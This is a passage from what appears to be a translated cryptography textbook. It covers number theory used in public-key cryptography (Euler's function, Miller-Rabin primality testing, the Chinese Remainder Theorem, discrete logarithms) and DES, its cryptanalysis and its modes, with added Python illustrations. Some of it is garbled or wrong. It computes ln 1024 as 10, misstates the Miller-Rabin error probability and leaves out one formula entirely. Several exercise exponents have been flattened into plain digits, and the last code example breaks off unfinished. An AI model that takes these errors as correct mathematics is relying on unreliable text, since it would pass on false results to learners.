Example. 5 and 7 are prime, and 2 and 3 are not multiples of 7 and 5 respectively, so by Fermat's theorem

    2^(7-1) mod 7 = 1 (= 2^6 mod 7 = 64 mod 7 = 1)
    3^(5-1) mod 5 = 1 (= 3^4 mod 5 = 81 mod 5 = 1)
    (-2)^(11-1) mod 11 = 1 (= 2^10 mod 11 = 1024 mod 11 = 1)

This result is used in public-key cryptography. It is also used to test whether an integer p is prime: choose random numbers a and check whether the property above holds; the conclusion that p is prime becomes more convincing the more random choices of a pass the test.

III.4.5 Euler's function

Let n be a positive integer. Reducing every integer modulo n gives the complete set of possible residues: 0, 1, 2, ..., n-1. From this set we form the reduced set, consisting of the numbers relatively prime to n, and we are interested in how many such elements there are for a given positive integer n.

Example. For n = 10:
o The complete set of residues is {0,1,2,3,4,5,6,7,8,9}
o The reduced set of residues relatively prime to 10 is {1,3,7,9}
o The number of elements of the reduced set is the value of Euler's function φ(n). So φ(10) = 4.

To compute φ(n) we rule out counting the numbers less than n that are relatively prime to n, because that is a laborious problem. In general, Euler's function of a number can be computed from its prime factorisation.
o Clearly, if p is prime, φ(p) = p-1
o If p and q are two different primes, it can be proved that:
o φ(p.q) = (p-1)(q-1)
o If p is prime, then φ(p^n) = p^n - p^(n-1)

o If s and t are relatively prime, then φ(s.t) = φ(s).φ(t)

Example.

    φ(37) = 37 - 1 = 36
    φ(21) = (3-1)×(7-1) = 2×6 = 12
    φ(72) = φ(8.9) = φ(8).φ(9) = φ(2^3).φ(3^2) = (2^3-2^2)(3^2-3^1) = 4.6 = 24

III.4.6 Euler's theorem

Euler's theorem is a generalisation of Fermat's theorem:

    a^φ(n) mod n = 1

for every pair of relatively prime positive integers a and n: gcd(a,n) = 1.

Example.
    a = 3; n = 10; φ(10) = 4; so 3^4 = 81 = 1 mod 10
    a = 2; n = 11; φ(11) = 10; so 2^10 = 1024 = 1 mod 11

III.4.7 Primality testing

Suppose we need to find a very large prime. Having picked a sufficiently large number at random, we must check whether it is prime. The traditional method is trial division:
o Divide by every number (only primes are needed) less than or equal to the square root of the number. If it is not divisible by any of them, it is prime.
o This is efficient only for small numbers.

Another approach, which we consider here, uses statistical primality tests based on properties
o that every prime must satisfy,
o but that some non-prime numbers, called pseudoprimes, also satisfy.

Specifically, the test based on Fermat's theorem is as follows: if the number n being tested is prime, it satisfies Fermat's theorem for every number a less than it:

    a^(n-1) mod n = 1

So we pick a random number a and check whether n has this property. If it does, n may be prime; if more confidence is required, we repeat the check several times with randomly chosen numbers a. Each time the test is passed, the probability that n is prime increases.

Note that
- if b^i mod n = 1, then b^(2i) mod n = (1)^2 mod n = 1, and
- if b^i mod n = n - 1, then b^(2i) mod n = (n - 1)^2 mod n = (n^2 - 2n + 1) mod n = 1

To test whether n is prime we need only consider odd n; then n-1 is even and can be written as

    (n-1) = 2^k.q

To compute a^(n-1), we compute a^q and then square it k times in succession.
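The plain Fermat check next to one Miller-Rabin round built from the two observations above (write n-1 = 2^k.q, compute a^q, then keep squaring). This is an added example, not part of the original text; the sample numbers 561 and 2047 are composites chosen for the example, and the function names are assumptions.

```python
import random


def fermat_round(n, a):
    """True if n passes Fermat's check a^(n-1) mod n = 1 for the base a."""
    return pow(a, n - 1, n) == 1


def strong_round(n, a):
    """One Miller-Rabin round for odd n > 3 and base a with 1 < a < n-1.

    Returns True for 'maybe prime' and False for 'composite'.
    """
    k, q = 0, n - 1
    while q % 2 == 0:              # n - 1 = 2^k * q with q odd
        k, q = k + 1, q // 2
    x = pow(a, q, n)               # a^q mod n
    if x == 1 or x == n - 1:
        return True
    for _ in range(k - 1):         # a^(2q), a^(4q), ..., a^(2^(k-1) q)
        x = x * x % n
        if x == n - 1:
            return True
    return False


def is_probable_prime(n, rounds=10, rng=random):
    """Repeat the strong round with random bases; False is always definitive."""
    if n < 4:
        return n in (2, 3)
    if n % 2 == 0:
        return False
    return all(strong_round(n, rng.randrange(2, n - 1)) for _ in range(rounds))


if __name__ == "__main__":
    # 561 = 3 * 11 * 17 passes Fermat's check for every base relatively prime
    # to it, yet a single strong round with base 2 exposes it as composite.
    print("Fermat,  n=561,  a=2:", fermat_round(561, 2))
    print("Strong,  n=561,  a=2:", strong_round(561, 2))
    # 2047 = 23 * 89 fools the strong round for base 2 but not for base 3,
    # which is why the base is drawn at random and the round is repeated.
    print("Strong,  n=2047, a=2:", strong_round(2047, 2))
    print("Strong,  n=2047, a=3:", strong_round(2047, 3))
    print("1759 probably prime :", is_probable_prime(1759))
```
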

The Miller-Rabin algorithm

The algorithm is as follows:

    TEST (n) is:
    1. Find integers k, q, k > 0, q odd, so that (n-1) = 2^k.q
    2. Select a random integer a, 1 < a < n-1
    3. if a^q mod n = 1 then return ("maybe prime");
    4. for j = 0 to k - 1 do
    5.     if (a^(2^j.q) mod n = n-1) then return ("maybe prime")
    6. return ("composite")

Probabilistic considerations

If the Miller-Rabin algorithm returns "composite", the number is certainly not prime, because then n and the number a < n do not satisfy Fermat's theorem, that is a^(n-1) mod n ≠ 1. Otherwise the number may be prime, or a pseudoprime in the sense that it satisfies Fermat's theorem for the number a < n. It has been proved that the probability that such a pseudoprime is not prime is 1/4. It follows that if the test is repeated t times with different random choices of a, the probability that n is prime after t tests is:

    1 - (1/4)^t

Example. After 10 steps, t = 10, in each of which the given number n may be prime, the probability that n is prime is 1 - (1/4)^10 > 0.99999.

Distribution of primes. The prime number theorem states that primes occur on average once in every ln n integers (considering numbers of size n). So, ignoring even numbers and multiples of 5, we need to test 0.4 ln n numbers of size n to find one prime. For example, with n = 1024, 0.4*ln 1024 = 0.4*10 = 4, which means that among the first 1024 numbers, on average one number in 4 is prime. Note that this is only an average: sometimes primes are very close together and sometimes they are very far apart.

III.4.8 The Chinese Remainder Theorem

In many cases we want to speed up modular computation. Operations modulo small numbers are much faster than modulo large numbers. So if a large number can be factored into a product of small, pairwise relatively prime numbers, the Chinese Remainder Theorem gives an efficient way to compute.

Consider computation modulo a product of numbers, mod M with M = m1 m2 .. mk, where GCD(mi, mj) = 1 for all i different from j. The Chinese Remainder Theorem lets us work with each modulus mi separately. Because the time taken by modular operations is proportional to the size of the modulus, this is faster than computing modulo the whole of M.

The Chinese Remainder Theorem can be applied in several ways, as follows.

Computing modulo a large number. To compute A mod M, with M fairly large and A some arithmetic expression, we first compute all the ai = A mod mi. We then use the formula


where Mi = M/mi

Example. Compute 17^8 mod 77. Applying the Chinese Remainder Theorem, we take A = 17^8, m1 = 7, m2 = 11. Then M1 = 11, M2 = 7 and

    11^-1 mod 7 = 4^-1 mod 7 = 2, so c1 = 11*2 = 22
    7^-1 mod 11 = 8, so c2 = 7*8 = 56
    a1 = 17^8 mod 7 = (17 mod 7)^8 mod 7 = 3^8 mod 7 = (3^2)^4 mod 7 = 2
    a2 = 17^8 mod 11 = (17 mod 11)^8 mod 11 = 6^8 mod 11 = (6^2)^4 mod 11 = 3^4 mod 11 = 4

So A = 17^8 mod 77 = (2*22 + 4*56) mod 77 = 268 mod 77 = 37.

Solving systems of modular equations. Let ai = x mod mi, with GCD(mi, mj) = 1 for all i different from j. We again apply the Chinese Remainder Theorem to find x.

Example. Let x ≡ 5 mod 7 and x ≡ 6 mod 11. Find x.
Applying the Chinese Remainder Theorem, we compute 7^-1 mod 11 = 8 and 11^-1 mod 7 = 2. So

    x = (5*2*11 + 6*8*7) mod (7*11) = 61 mod 77.
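Both uses of the Chinese Remainder Theorem worked above, with the coefficients ci = Mi * (Mi^-1 mod mi) taken from the example (c1 = 22, c2 = 56). This is an added example, not part of the original text; the function names are assumptions, and the three-modulus input in the demonstration is constructed. It requires Python 3.8 or later for pow(x, -1, m) and math.prod.

```python
from math import gcd, prod


def crt_coefficients(moduli):
    """Return (M, [c_1, ..., c_k]) with c_i = M_i * (M_i^-1 mod m_i), M_i = M/m_i."""
    for i, mi in enumerate(moduli):
        for mj in moduli[i + 1:]:
            if gcd(mi, mj) != 1:
                raise ValueError(
                    "moduli %d and %d are not relatively prime" % (mi, mj))
    M = prod(moduli)
    return M, [(M // m) * pow(M // m, -1, m) for m in moduli]


def crt_combine(residues, moduli):
    """Solve x = a_i mod m_i for all i; the result is unique modulo M."""
    M, coeffs = crt_coefficients(moduli)
    return sum(a * c for a, c in zip(residues, coeffs)) % M


def pow_mod_crt(base, exponent, moduli):
    """Compute base^exponent mod M by working modulo each small m_i.

    Returns (value mod M, list of residues a_i).
    """
    residues = [pow(base % m, exponent, m) for m in moduli]
    return crt_combine(residues, moduli), residues


if __name__ == "__main__":
    print(crt_coefficients([7, 11]))        # M = 77, c1 = 22, c2 = 56
    print(pow_mod_crt(17, 8, [7, 11]))      # residues 2 and 4 combine to 37
    print(crt_combine([5, 6], [7, 11]))     # x = 5 mod 7, x = 6 mod 11
    # Constructed input with three moduli: the residues of 307.
    print(crt_combine([307 % 7, 307 % 9, 307 % 11], [7, 9, 11]))
```
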

III.4.9 Primitive roots

From Euler's theorem we have a^φ(n) mod n = 1 for a and n relatively prime. If no positive exponent smaller than φ(n) has this property for a, we call a a primitive root of n. In detail:

Consider m such that a^m mod n = 1, with GCD(a,n) = 1. By Euler's theorem m = φ(n) satisfies this relation, but a smaller value m < φ(n) may satisfy it too. Once such an m is reached, the relation also holds for multiples of m, so there is a cycle. If m = φ(n) is the smallest positive number that satisfies the formula, a is called a primitive root of n.

If p is prime and a is a primitive root of p, then the powers of a: a^0, a^1, ..., a^(p-2) generate the group modulo p. Finding the primitive roots a of n is useful when studying public-key ciphers.

Example. Take the prime p = 5 and check whether a = 2 is a primitive root of 5. We have:

    2 mod 5 = 2; 2^2 mod 5 = 4; 2^3 mod 5 = 3; 2^4 mod 5 = 1

Clearly m = 4 = φ(5) is the smallest positive exponent with 2^m mod 5 = 1, so 2 is a primitive root of 5.

Take n = 8 and check whether a = 3 is a primitive root of 8. We have:

    3 mod 8 = 3; 3^2 mod 8 = 1; 3^3 mod 8 = 3; 3^4 mod 8 = 1

Clearly m = 2 < 4 = φ(8) is the smallest positive exponent with 3^m mod 8 = 1, so 3 is not a primitive root of 8.

III.4.10 Discrete logarithms

The inverse of the exponentiation problem is to find the discrete logarithm of a number modulo p, that is, to find an integer x such that

    a^x = b mod p

This is also written x = log_a b mod p or x = ind_{a,p}(b).

If a is a primitive root of p and p is prime, the discrete logarithm always exists; otherwise it may not.

Example. Find x = log_2 3 mod 13. By trying in turn:

    2^0 mod 13 = 1; 2^1 mod 13 = 2; 2^2 mod 13 = 4; 2^3 mod 13 = 8; 2^4 mod 13 = 3

So log_2 3 mod 13 = 4.

Find x = log_3 4 mod 13 (find x such that 3^x = 4 mod 13). In this case there is no solution, because

    3^0 mod 13 = 1; 3^1 mod 13 = 3; 3^2 mod 13 = 9; 3^3 mod 13 = 1 = 3^0 mod 13

We see that while exponentiation is easy, the discrete logarithm problem is very hard. This too is a foundation of public-key cryptography.

Exercises

1. Show that the set of integers with integer addition forms a commutative group. Show that the set of integers with integer addition and integer multiplication forms a commutative ring. Does that ring form an integral domain or a field?
2. Show that the set of residues modulo n, Zn, with the two operations of addition and multiplication modulo n, forms a commutative ring. Under what condition on n is this ring a field?
3. Compute the values of the following modular expressions: 8 mod 9 + 7 mod 9; 8 mod 9 * 7 mod 9; 5 mod 11 9 mod 11; 53 mod 7; 520 mod 7; 5/6 mod 7
4. Compute the values of the following modular expressions: (-546) mod 13 - 347 mod 11; (1234 + 2345) mod 17; (213 * 345) mod 19; 15-1 mod 101; 41-1 mod 100; 1435 mod 11; (235*126/13) mod 19; 31130 mod 23; (23525 /17 + 12619. 397 /13) mod 29
5. Implement the extended Euclidean algorithm.

6. Express the following polynomial multiplications, with coefficients mod 2 and modulo the polynomial (x^3 + x + 1) (called GL(2^3)), as shift and XOR operations on bits:
   (x + 1) * (x^2 + x + 1) mod (x^3 + x + 1)
   x^2 * (x^2 + x + 1) mod (x^3 + x + 1)
   (x^2 + 1) * (x^2 + x + 1) mod (x^3 + x + 1)
   (x^2 + x + 1) * (x^2 + x + 1) mod (x^3 + x + 1)
7. Show that GL(2^3) is a field, and state the algorithm for finding the multiplicative inverses of the nonzero elements.
8. Compute Euler's function of the following integers: 12, 17, 21, 32, 36, 40, 72, 256.
8. Use Fermat's theorem and Euler's theorem to compute the following expressions: 616 mod 17; 1516 mod 17; 95100 mod 101; 74 mod 10; 95 mod 10; 1012 mod 21; 9190 mod 100
9. Implement a program that tests for pseudoprimes.
10. Solve the following modular equations:
   x mod 11 = 3; x mod 13 = 6
   y mod 51 = 11; y mod 100 = 15
   z mod 12 = 5; z mod 17 = 8; z mod 23 = 11
11. Use the Chinese Remainder Theorem to compute the values of the following expressions: 2530 mod (7*8); 70254 mod (11*13); 60-1 mod (11*13); ((21100 + 33-1). 4551) mod (7.9.11); ((19125 + 2551)4721 /37 mod (9.11.13)
12. Find the primitive roots of 9, 11.
13. Find the primitive roots of 13 and 17.
14. Compute the following discrete logarithms, if they exist: log_3 7 mod 11, log_2 9 mod 11, log_5 6 mod 13, log_3 7 mod 13, log_2 15 mod 17, log_3 11 mod 17

CHAPTER IV: THE DATA ENCRYPTION STANDARD (DES) AND THE ADVANCED ENCRYPTION STANDARD (AES)

IV.1 Modern block ciphers

We now consider modern block ciphers. This is the most widely used type of encryption algorithm. It is also used in combination with other procedures to provide security and authentication services. We first concentrate on the Data Encryption Standard DES (Data Encryption Standards) to illustrate the principles of block ciphers. To begin with, we look at two different ways of processing the information in the plaintext: one divides the data into blocks for processing, the other processes each unit of information directly.

IV.1.1 Block ciphers versus stream ciphers

o A block cipher processes the message block by block; each block in turn is encrypted or decrypted. It can be seen as a substitution on very large characters, each block consisting of 64 bits or more.
o A stream cipher processes the message bit by bit or byte by byte; each bit or byte in turn is encrypted or decrypted. The Vigenere autokey cipher is an example.
o Many current ciphers are block ciphers. They have a wider range of application. Many applications of symmetric encryption on networks use block ciphers.

Block cipher principles
o Most symmetric block ciphers are based on the Feistel cipher structure, proposed by the scientist Feistel in 1973. This is necessary because it must be possible to decrypt ciphertext efficiently.
o A block cipher is regarded as an extremely large substitution. A table with 2^64 entries would be needed for a 64-bit block cipher, and such a table is very large. It can therefore be replaced by building it from smaller blocks.
o The idea of a product cipher is used: substitution and permutation are combined, and many such rounds are applied.

IV.1.2 Claude Shannon and substitution-permutation ciphers

In 1949 Shannon introduced the idea of substitution-permutation networks (S-P networks), a modern product cipher of substitutions and permutations whose purpose is to thwart cryptanalysis based on statistical analysis. Suppose the cryptanalyst knows some statistical properties of the plaintext, such as the frequency distribution of letters and groups of letters. If these statistical characteristics are reflected in the ciphertext, the cryptanalyst will try to find the key or part of the key, or to guess the plaintext. Shannon wanted an ideal cipher in which all statistical characteristics are independent of the particular key used, so that the cryptanalyst has no basis for finding the key.

S-P networks form the basis of modern block ciphers. They are built on the two basic encryption operations we already know: substitution (S-box) and permutation (P-box). These produce confusion and diffusion of the message.

Confusion and diffusion
o An important property of a good cipher is that it must completely hide the statistical properties of the original message. As we have seen, the one-time pad can do this, thanks to the randomness of the pad key and its length being equal to that of the message.
o Shannon studied and proposed a more practical method: combine different components of the plaintext, processing them over many passes to obtain the ciphertext.
o Diffusion dissipates the statistical structure of the plaintext over the ciphertext. This is achieved if each plaintext bit affects the value of many ciphertext bits, or equivalently each ciphertext bit is affected by many plaintext bits.
o Confusion makes the relationship between the ciphertext and the key as complex as possible. A ciphertext with high confusion makes guessing the key very difficult, even when the attacker has the statistical characteristics of the ciphertext and knows how the key acts on the ciphertext.

IV.1.3 The Feistel cipher structure

Horst Feistel created the Feistel cipher on the basis of an invertible product cipher, that is, a combination of substitution and permutation in which the decryption procedure is the same as encryption: only the roles of the ciphertext block and the plaintext block, and the order in which the subkeys are used, need to be changed. A subkey is derived from the main key for each round.

Divide the input block into 2 equal halves:
o Perform a substitution on the left half: apply the round function to the right half and the subkey, and let the result act on the left half.
o Then swap the halves; the right half has not been processed.
o Process the next round.
This is a realisation of Shannon's substitution combined with permutation.

We look specifically at the structure of a Feistel cipher with n rounds:

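Design principles of Feistel block ciphers

o Increasing the block size increases security but reduces encryption speed.
o Increasing the key size increases security (key search becomes harder) but slows the cipher.
o Increasing the number of rounds increases security but slows the cipher.
o A more complex subkey generation makes cryptanalysis harder but slows the cipher.
o A more complex round function makes cryptanalysis harder but slows the cipher.
o Fast software encryption/decryption and resistance to cryptanalysis are the criteria most often cited for practical applications and evaluation.

[Figure: Feistel block cipher decryption]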

IV.2 The Data Encryption Standard (DES)

DES (Data Encryption Standard) has been the most widely used block cipher in the world in recent times. It was issued in 1977 by NBS, the US National Bureau of Standards (now NIST, the National Institute of Standards and Technology). DES is a block cipher with 64-bit data blocks and a 56-bit key. It has been widely used, and its security has been debated at length.

IV.2.1 History of DES

In the late 1960s IBM developed the Lucifer cipher in a project led by Feistel. Lucifer originally used 64-bit data blocks and a 128-bit key, and was then developed further as a commercial cipher. In 1973 NBS issued a request for proposals for a national encryption standard. IBM submitted a revised version of Lucifer, which later became DES. The design of DES was controversial. Because the DES standard was public, people commented on its speed, its key length, its level of security and its resistance to cryptanalysis. A 56-bit key was chosen instead of 128 bits to increase processing speed, and design criteria for a data encryption standard were set out. The reasoning and analyses showed that such a design was appropriate, so DES came into wide use, especially in the financial sector.

IV.2.2 The DES encryption scheme

Initial permutation IP: this is the first step of the data computation. IP reorders the input bits: the even bits go to the left half and the odd bits to the right half. The permutation is easy to implement in hardware. Each hexadecimal digit represents 4 bits, so 16 digits represent 64 bits. Each bit has a position determined by the initial permutation (see the table in the appendix at the end of the document). Example:

   IP(675a6967 5e5a6b5a) = (ffb2194d 004df6fb)

Structure of one DES round

A round works on a 32-bit left half and a 32-bit right half. As in every Feistel cipher, the right half of the previous round becomes the left half of the next step, and the output of the round function applied to the right half and the subkey is added modulo 2 to the left half. This can be written as:

   L_i = R_(i-1)
   R_i = L_(i-1) xor F(R_(i-1), K_i)

Here F takes the 32-bit right half R, expands it to 48 bits using the permutation E, and adds it to the 48-bit subkey. The result is split into 8 groups of 6 bits, which are passed through 8 S-boxes to give a 32-bit result. Finally the 32-bit permutation P is applied to obtain the 32-bit output, which is added to the left half to become the right half of the next step.

The substitution boxes S (see the appendix at the end of the document)

There are 8 different S-boxes, each mapping 6 bits to 4 bits. The S-boxes perform the substitutions; their contents follow no simple rule and are fixed. Each S-box is a 4 x 16 table in which every row is a permutation of 16 elements. Given 6 input bits, the two outer bits (bits 1 and 6) are joined into a binary number that selects a row from 0 to 3 of the S-box. The four bits 2 to 5 form a binary number that selects a column from 0 to 15. The entry at that row and column is a number from 0 to 15; written in binary it gives the 4 output bits. In this way the 48 bits are split into 8 groups of 6 bits, which the 8 S-boxes turn into 8 groups of 4 bits, 32 bits in total.

The row selection in the S-boxes depends on both the data and the key; this feature is called autoclaving (autokeying).

Example: S(18 09 12 3d 11 17 38 39) = 5fd25e03

DES subkey generation

o 16 subkeys are produced, one for each of the 16 rounds of DES. The 56 input key bits are used as an 8 x 8 table in which the 8th column is not used.
o The initial key permutation PC1 is applied and the 56 bits are split into two 28-bit halves.
o There are 16 stages: in each round the left and right halves are each rotated left by 1 or 2 bits, as appropriate. The two halves are carried forward to the next round. They are also passed through the permutation PC2, which selects 24 bits from each half and joins them into the 48-bit subkey.
o Practical implementations in both hardware and software are efficient.


The specific parameters of the initial permutation, the S-boxes and the DES key generation algorithm are given in the appendix at the end of the document.

DES decryption

Decryption reverses the encryption process. With the Feistel design, one runs the encryption procedure again with the subkeys taken in reverse order, from SK16 back to SK1. The initial permutation IP undoes the effect of the final permutation FP. The first round, with SK16, undoes the 16th encryption round. The 16th round, with SK1, undoes the first encryption round. The final permutation FP undoes the initial permutation IP. The original data is thus recovered.

IV.2.3 Properties of DES

Avalanche effect. Changing 1 bit of the key triggers an avalanche that changes many bits of the ciphertext. This is a desirable property of the key in an encryption algorithm. Changing 1 bit of the input or of the key changes about half of the output bits, so the key cannot be guessed. DES exhibits a strong avalanche effect.

Strength of DES: key size. The DES key is 56 bits long, giving 2^56 = 7.2 x 10^16 different values. This is a very large number, so exhaustive search is very hard. Recent results show that the time needed to break a DES ciphertext without knowing the key was: a few months on the Internet in 1997; a few days on dedicated hardware in 1998; 22 hours when both approaches were combined in 1999. The plaintext can therefore still be recovered after a certain time, given powerful computing resources. For this reason several variants of DES have been considered to strengthen it.

Strength of DES: timing attacks. These attack the actual implementation of the cipher. Knowledge of how the algorithm is implemented is used to derive information about some or all of the subkeys. In particular, they exploit the fact that computations take different amounts of time depending on their input values, so the cryptanalyst observes the execution time and makes inferences about the key. A cryptanalyst might devise smart cards that infer the key in this way, a point that needs further discussion.

Strength of DES: analytic attacks. There are several cryptanalytic attacks on DES that exploit the deep structure of the cipher. By gathering information about encryptions, one can deduce all or some of the subkeys in use and, if necessary, search exhaustively for the remaining ones. In general these are statistical attacks: differential cryptanalysis, linear cryptanalysis and related-key attacks.

Differential cryptanalysis

One of the significant recent public advances in cryptanalysis is differential cryptanalysis. It was known to the NSA in the 1970s, for example during the design of DES. Murphy, Biham and Shamir published the differential method in 1990. It is a powerful method for analysing block ciphers and has been used to analyse most current block ciphers with varying degrees of success. DES, however, resists these attacks reasonably well.

Differential cryptanalysis is a statistical attack against Feistel ciphers. Feistel ciphers use structures not used before, such as the S-P network design, in which the output of the function f is influenced by both the input and the key. The plaintext value therefore cannot be traced back without knowing the key. Differential cryptanalysis compares two related pairs of encryptions:

o with a known difference in the input,
o examining the difference in the output,
o when the same subkey is used.
o In the following formula, for two different inputs, the left-hand side is the difference at round i, expressed through the difference at the previous round i-1 and the difference of the function f in square brackets.

An input difference gives an output difference with a given probability.

o If an input/output instance with high probability is found, the subkey used in that round can be deduced.
o This can then be iterated over several rounds (with decreasing probability):
  - right pairs give the same key bits,
  - wrong pairs give random values.
o For a large number of rounds, the probability that many 64-bit input pairs satisfy the requirement is very small.
o Biham and Shamir showed how an iterated 13-round characteristic can break the full 16-round DES.


o The attack proceeds as follows: plaintext pairs with a known input XOR are encrypted repeatedly until the desired output XOR is obtained.
o At that point, if the intermediate rounds match the required XOR, the pair is a right pair; otherwise it is a wrong pair. The relative ratio of wrong pairs for the attack is known in advance from statistics.
o The keys for the rounds can then be deduced.

Linear cryptanalysis

This is another recent development. It is also a statistical method. It too has to be iterated over the rounds with decreasing probabilities. It was developed by Matsui and others in the early 1990s. The method is based on finding linear approximations. It has been estimated that DES can be attacked with 2^47 known plaintexts, so linear cryptanalysis is still infeasible in practice.

o Find a linear approximation that holds with probability p != 1/2:
   P[i1,i2,...,ia] (+) C[j1,j2,...,jb] = K[k1,k2,...,kc]
  where ia, jb, kc are bit positions in the plaintext, the ciphertext and the key.
o This condition gives a linear equation in the key bits. One key bit is obtained using a maximum-likelihood algorithm.
o A large number of trial encryptions is used. The effectiveness is given by |p - 1/2|.

In the course of studying DES, its design criteria have been systematised. As reported by Coppersmith in [COPP94]:

o 7 criteria are given for the S-boxes, ensuring
  - non-linearity,
  - resistance to differential cryptanalysis,
  - good confusion.
o 3 criteria are given for the permutation P, to increase diffusion.

Block cipher design principles

The basic principles of block ciphers are still those proposed by Feistel in the 1970s:

o Number of rounds: the more the better; the best attack should be no better than exhaustive search.
o Each round has a function that provides confusion; it is non-linear and has an avalanche effect.
o Subkey generation is complex, and the key has an avalanche effect on the ciphertext.

IV.2.4 DES modes of operation

A block cipher encrypts blocks of fixed size; DES, for example, encrypts 64-bit blocks with a 56-bit key. A way of applying it in practice is needed, because the information to be encrypted has arbitrary size. Originally 4 modes of operation were defined for DES in the ANSI standard ANSI X3.106-1983 Modes of Use. This has now been extended to 5 modes for DES and for the Advanced Encryption Standard (AES). Some modes are block-oriented and some are stream-oriented.

1. Electronic Codebook (ECB)

o The message is split into independent blocks, and each block is then encrypted.
o Each block is a value that is substituted, as with a codebook, hence the name.
o Each block is encrypted independently of the others:
   C_i = DES_K1(P_i)
o Use: secure transmission of single values.

o Advantages and limitations of ECB
  Repetitions in the message show up as repetitions in the ciphertext
  - if they are aligned with the block boundaries,
  - particularly with image data,
  - or with messages that change very little, which become a target for cryptanalysis.
  The weakness is that the blocks are encrypted independently.
  ECB is used mainly when sending small amounts of data.

2. Cipher Block Chaining (CBC)

o The message is split into blocks,
o but the blocks are linked together during encryption.
o The blocks are chained in sequence, hence the name.
o An initial vector IV is used to start the process:
   C_i = DES_K1(P_i XOR C_(i-1))
   C_(-1) = IV
o Uses: encryption of bulk data, authentication.

o Advantages and limitations of CBC
  Each ciphertext block depends on all the plaintext blocks.
  A change somewhere in the message affects every ciphertext block after it.
  The initial vector IV must be known in advance to both sender and receiver.
  - However, if the IV is sent in the clear, an attacker can change bits of the first block and change the IV to compensate.
  - The IV must therefore either be a fixed value agreed in advance, or be encrypted in ECB mode and sent before the rest of the message.
  At the end of the message, a short final block has to be handled:
  - it can be padded with non-data values such as NULLs,
  - or padded so that the last byte is a count of the pad size. For example, [ b1 b2 b3 0 0 0 0 5 ] has 3 data bytes, followed by 5 bytes of padding and count.

3. Cipher FeedBack (CFB)

o The message is treated as a stream of bits,
o which is added to the output of the block cipher.
o The result is fed back for the next stage, hence the name.
o In general the number of feedback bits may be 1, 8, 64 or any other value; these are denoted CFB1, CFB8, CFB64, ...
o It is usually most efficient to use all 64 bits:
   C_i = P_i XOR DES_K1(C_(i-1))
   C_(-1) = IV
o Uses: stream data encryption, authentication.

Advantages and limitations of CFB

o Used when data arrives in bytes or bits.
o The most common stream mode.
o A limitation is the need to stall while the block encryption is performed after every n bits.
o Note that the block cipher is used in encryption mode at both ends.
o Errors propagate for several blocks after the error.

4. Output FeedBack (OFB)

o The message is treated as a stream of bits.
o The output of the cipher is added to the message.
o That output is then fed back, hence the name.
o The feedback is independent of the message,
o so it can be computed in advance:
   C_i = P_i XOR O_i
   O_i = DES_K1(O_(i-1))
   O_(-1) = IV
o Use: stream encryption on audio channels.

Advantages and limitations of OFB

o Used when error feedback is a problem, or where the encryption has to be done before the message is available.
o Very similar to CFB,
o but the feedback comes from the output of the cipher and is independent of the message.
o It is a variant of the Vernam cipher, so the same sequence (key + IV) must never be reused.
o Sender and receiver must remain synchronised, and some recovery method is needed to ensure this.
o The original specification allowed m bits of feedback in the standards.
o Subsequent research showed that only OFB64 should be used.

5. Counter (CTR)

o A newer mode, although proposed long ago.
o Similar to OFB, but it encrypts a counter value rather than a feedback value.
o A different key and counter value is required for every plaintext block (never reused):
   C_i = P_i XOR O_i
   O_i = DES_K1(i)
o Use: encryption on high-speed networks.
o Advantages and limitations of CTR
  Efficiency
  - encryption can be done in parallel,
  - the keystream can be prepared in advance if needed,
  - good for very high-speed links.
  Random access to encrypted data blocks.
  Provable security.
  But one must be certain never to reuse a key/counter value, otherwise the cipher can be broken.
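The following added example (not code from the textbook) runs three of the modes above, ECB, CBC and CTR, over a toy 64-bit Feistel cipher, and also shows the Feistel property from IV.1.3 that decryption is the encryption routine with the subkeys reversed. The round function and key schedule are SHA-256-based stand-ins, not DES, and every function name is hypothetical.

```python
import hashlib

BLOCK = 8  # bytes: a 64-bit block, the DES block size


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))  # truncates to the shorter input


def subkeys(key: bytes, rounds: int = 16) -> list:
    # Hypothetical key schedule: one 4-byte subkey per round (not DES PC1/PC2).
    return [hashlib.sha256(key + bytes([i])).digest()[:4] for i in range(rounds)]


def round_f(right: bytes, k: bytes) -> bytes:
    # Stand-in round function F(R, K); DES would use E, the S-boxes and P here.
    return hashlib.sha256(k + right).digest()[:4]


def feistel(block: bytes, ks: list) -> bytes:
    left, right = block[:4], block[4:]
    for k in ks:
        # L_i = R_(i-1);  R_i = L_(i-1) xor F(R_(i-1), K_i)
        left, right = right, xor(left, round_f(right, k))
    return right + left  # final swap: the same routine then also decrypts


def encrypt_block(block: bytes, key: bytes) -> bytes:
    return feistel(block, subkeys(key))


def decrypt_block(block: bytes, key: bytes) -> bytes:
    return feistel(block, subkeys(key)[::-1])  # subkeys in reverse order


def pad(msg: bytes) -> bytes:
    # Zero fill plus a final count byte, e.g. [b1 b2 b3 0 0 0 0 5].
    n = BLOCK - len(msg) % BLOCK
    return msg + bytes(n - 1) + bytes([n])


def unpad(msg: bytes) -> bytes:
    return msg[:-msg[-1]]


def blocks(data: bytes) -> list:
    return [data[i:i + BLOCK] for i in range(0, len(data), BLOCK)]


def ecb_encrypt(msg: bytes, key: bytes) -> bytes:
    # C_i = E_K(P_i): every block is encrypted independently.
    return b"".join(encrypt_block(b, key) for b in blocks(pad(msg)))


def cbc_encrypt(msg: bytes, key: bytes, iv: bytes) -> bytes:
    out, prev = [], iv
    for b in blocks(pad(msg)):
        prev = encrypt_block(xor(b, prev), key)  # C_i = E_K(P_i xor C_(i-1))
        out.append(prev)
    return b"".join(out)


def cbc_decrypt(ct: bytes, key: bytes, iv: bytes) -> bytes:
    out, prev = [], iv
    for c in blocks(ct):
        out.append(xor(decrypt_block(c, key), prev))
        prev = c
    return unpad(b"".join(out))


def ctr_crypt(data: bytes, key: bytes, nonce: bytes) -> bytes:
    # C_i = P_i xor E_K(nonce || i); the same call decrypts. nonce is 4 bytes.
    out = b""
    for i, b in enumerate(blocks(data)):
        out += xor(b, encrypt_block(nonce + i.to_bytes(4, "big"), key))
    return out


def repeated_blocks(ct: bytes) -> int:
    # Number of ciphertext blocks that duplicate an earlier block.
    bl = blocks(ct)
    return len(bl) - len(set(bl))


if __name__ == "__main__":
    key, iv = b"constructed key", bytes(range(8))   # constructed sample values
    msg = b"PAY 100$" * 4                           # four identical 8-byte blocks
    print("ECB repeated blocks:", repeated_blocks(ecb_encrypt(msg, key)))
    print("CBC repeated blocks:", repeated_blocks(cbc_encrypt(msg, key, iv)))
    c1 = ctr_crypt(b"first message...", key, b"\x00\x00\x00\x01")
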